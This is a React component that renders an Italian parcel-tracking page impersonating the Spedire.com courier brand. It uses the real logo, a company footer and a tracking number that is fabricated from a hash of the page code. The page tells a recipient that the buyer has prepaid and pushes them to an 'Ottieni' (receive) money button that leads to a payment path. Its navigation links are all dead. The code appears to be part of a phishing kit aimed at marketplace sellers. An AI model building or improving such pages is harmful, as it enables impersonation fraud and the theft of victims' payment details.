import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SpedireItSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const STEPS = ['Creata', 'Partita', 'In Transito', 'In Consegna', 'Consegnata'];

function SpedireHeaderBrand() {
  const base = process.env.PUBLIC_URL || '';
  return (
    <div className="spi-brand-inline">
      <img
        src={`${base}/spedire-it-logo.png`}
        alt="spedire by alsendo"
        className="spi-brand-logo-img"
      />
      <div className="spi-brand-tag">La tua spedizione, la nostra missione</div>
    </div>
  );
}

function trackingIdFromCode(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  if (!raw) return '—';
  const chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz0123456789';
  let h = 0;
  for (let i = 0; i < raw.length; i += 1) h = (h * 31 + raw.charCodeAt(i)) >>> 0;
  let out = '';
  let x = h;
  for (let i = 0; i < 16; i += 1) {
    x = (x * 1664525 + 1013904223) >>> 0;
    out += chars[x % chars.length];
  }
  return out;
}

function IconWallet() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <rect x="2" y="7" width="20" height="14" rx="2" />
      <path d="M16 7V5a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h8a2 2 0 0 0 2-2v-2" />
      <circle cx="16" cy="14" r="2" />
    </svg>
  );
}

function SpedireItSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'IT').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const priceStr =
    productPrice != null && Number.isFinite(productPrice)
      ? productPrice % 1 === 0
        ? String(Math.round(productPrice))
        : String(productPrice)
      : '—';

  const buyer = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const destination = (pageData?.delivery_address || '').trim() || '—';
  const productLabel = (pageData?.product_name || '').trim() || '—';
  const commentLine = (() => {
    if (productLabel === '—' && priceStr === '—') return '—';
    if (productLabel === '—') return `${priceStr} ${symbol}`;
    if (priceStr === '—') return productLabel;
    return `${productLabel}, ${priceStr} ${symbol}`;
  })();

  const trackingId = useMemo(
    () => trackingIdFromCode(pageCode || '', pageData),
    [pageCode, pageData],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const ctaLabel = priceStr === '—' ? `Ottieni — ${symbol}` : `Ottieni ${priceStr} ${symbol}`;

  if (loading && pageCode) {
    return (
      <div className="spi-wrap">
        <div className="spi-loading">Caricamento…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="spi-wrap">
      <header className="spi-header">
        <div className="spi-header-top">
          <div className="spi-brand-block">
            <SpedireHeaderBrand />
          </div>
          <nav className="spi-nav" aria-label="Menu">
            <a href="#/" onClick={(e) => e.preventDefault()}>Come Funziona</a>
            <a href="#/" onClick={(e) => e.preventDefault()}>Tariffe</a>
            <a href="#/" onClick={(e) => e.preventDefault()}>
              Servizi <span className="spi-nav-chev">▼</span>
            </a>
            <a href="#/" onClick={(e) => e.preventDefault()}>
              Risorse <span className="spi-nav-chev">▼</span>
            </a>
          </nav>
          <div className="spi-header-actions">
            <a href="#/" className="spi-btn-green" onClick={(e) => e.preventDefault()}>Crea Spedizione</a>
            <a href="#/" className="spi-btn-blue" onClick={(e) => e.preventDefault()}>Traccia spedizione</a>
            <a href="#/" className="spi-btn-outline" onClick={(e) => e.preventDefault()}>Serve aiuto?</a>
          </div>
        </div>
      </header>

      <main className="spi-main">
        <div className="spi-main-inner">
          <h1 className="spi-track-headline">
            Abbiamo rintracciato con successo la spedizione associata al numero di tracking: {trackingId}
          </h1>
          <p className="spi-track-ref">Riferimento n. {trackingId}</p>

          <div className="spi-steps" aria-hidden>
            {STEPS.map((label, i) => (
              <div key={label} className={`spi-step ${i === 0 ? 'spi-step--done' : ''}`}>
                <div className="spi-step-dot">{i === 0 ? '✓' : ''}</div>
                <div className="spi-step-label">{label}</div>
              </div>
            ))}
          </div>

          <div className="spi-card">
            <h2 className="spi-card-title">Dati Destinatario:</h2>
            <div className="spi-field">
              <div className="spi-field-k">Nome</div>
              <div className="spi-field-v">{buyer}</div>
            </div>
            <div className="spi-field">
              <div className="spi-field-k">Destinazione</div>
              <div className="spi-field-v">{destination}</div>
            </div>
            <div className="spi-field">
              <div className="spi-field-k">Commento</div>
              <div className="spi-field-v">{commentLine}</div>
            </div>
          </div>

          <h2 className="spi-section-title">Tracking dettagliato del trasportatore:</h2>
          <ul className="spi-bullets">
            <li>Il cliente ha inserito i dati e ha effettuato un pagamento anticipato</li>
            <li>Spedizione creata Spedire.com</li>
          </ul>

          <Link to={index2Path} className="spi-cta">
            <IconWallet />
            {ctaLabel}
          </Link>

          <p className="spi-link-detail">
            Visualizza tracking dettagliato del trasportatore cliccando{' '}
            <a href="#/" onClick={(e) => e.preventDefault()}>qui</a>
          </p>
        </div>
      </main>

      <div className="spi-bottom-cta">
        <p>Hai un pacco da spedire? Inizia subito a risparmiare con Spedire.com</p>
        <a href="#/" className="spi-btn-green" style={{ display: 'inline-block' }} onClick={(e) => e.preventDefault()}>
          Crea nuova spedizione
        </a>
      </div>

      <footer className="spi-footer">
        <div className="spi-footer-inner">
          <div className="spi-footer-grid">
            <div>
              <strong>Chi siamo</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Spedire.com</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Termini e condizioni</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Privacy Policy</a>
            </div>
            <div>
              <strong>Tariffe</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Spedire in Italia</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Spedire all&apos;estero</a>
            </div>
            <div>
              <strong>Risorse</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Come funziona</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Faq</a>
            </div>
          </div>
          <div className="spi-footer-legal">
            <span>ESITE SRL - P.IVA IT02227730229 - ITALIA</span>
            <span>Pagina di stato spedizione</span>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default SpedireItSuccess;
